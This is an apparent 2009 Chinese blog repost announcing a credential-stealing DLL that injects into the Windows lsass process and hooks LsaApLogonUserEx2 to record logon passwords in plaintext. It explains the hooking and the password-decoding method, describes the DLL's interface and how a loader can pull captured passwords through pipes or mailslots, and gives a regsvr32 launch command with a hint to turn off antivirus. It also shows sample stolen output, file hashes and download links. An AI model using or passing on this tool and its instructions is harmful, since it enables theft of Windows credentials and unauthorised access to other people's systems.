记录Windows登陆密码的程序

from: t00ls.net

========原理:
windows的身份验证一般最终都是在lsass进程,默认模块是msv1_0.dll,而关键在其导出函数LsaApLogonUserEx2,
本程序通过注入代码到lsass进程hook LsaApLogonUserEx2,截取密码。只要有身份验证的过程,
LsaApLogonUserEx2就会触发,如ipc$,runsa,3389远程桌面登陆等。

程序对不同系统做了处理,在2000,2003,xp,vista上都可以截取,
在2000,2003,xp中,通过UNICODE_STRING.Length 的高8位取xor key,如果密码是编码过的,则通过ntdll.RtlRunDecodeUnicodeString解码,
vista则通过AdvApi32.CredIsProtectedW判断密码是否编码过,解码用AdvApi32.CredUnprotectW。

可以自己调试器挂lsass跑一下:)

========接口:
HRESULT WINAPI DllInstall( BOOL bInstall, LPCWSTR pszCmdLine);

这是本dll导出的一个函数原型,请不要被名字蛊惑了,这个程序是绿色的。
这个函数内部并没有做任何自启动安装的动作,没有修改注册表或系统文件。只是想选一个符合regsvr32调用的接口而已。

第一个参数本程序没用到,
第二个参数请指定一个文件路径(注意是UNICODE的),记录到的数据将保存到这里(是Ansi的)。
文件路径可以像这样 C:\x.log,
也可以像\\.\pipe\your_pipename, \\.\mailslot\yourslot
所以你可以自己写loader来调用这个dll,让dll截取到密码时通过pipe或mailslot将数据发给你的程序。数据就是一个字符串(是Ansi的)

========测试:
你可以不急着写自己的loader来调用,用regsvr32作为loader来测试一下:(你可能需要关闭某些主动防御)
regsvr32 /n /i:c:\xxx.log c:\pluginWinPswLogger.dll
正常的话regsvr32弹出一个提示成功。

这时候你可以切换用户或锁定计算机,然后重新登陆进去,这个过程密码信息就被拦截下来了并保存到c:\xxx.log。

=========End

By LZX
2009.08.20

2009.08.22(更新了一下)

pop使用XP Sp3测试的时获取的内容如下:

[09/11/2009 07:02:34]
LogonType: 2, MessageType: 2
Domain: POP
User: Administrator
Password: xxxx

用regsvr32注册之后我这里不能使用/u来卸载,不知道其他的是怎么样的。大家自己测试一下吧。使用前对一下md5

文件: pluginWinPswLogger2.dll
大小: 7168 字节
修改时间: 2009年8月22日, 13:38:43
MD5: A82C5F66B29D4F99056DF9CC70A2E43E
SHA1: 45FE198B1995C0DCDC001D34822C8D8E2A33F942
CRC32: 7959ABFF

windows-login-password.rar 下载地址:
http://www.uudisc.com/user/pop3067/file/2004966
http://www.st0p.org/blog/wp-content/uploads/2009/08/can-record-windows-login-password-dongdong.rar
http://www.lixiaopeng.org/blog/wp-content/uploads/2009/08/can-record-windows-login-password-dongdong.rar

This entry was posted in Technology and tagged , . Bookmark the permalink. 5,581 views

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *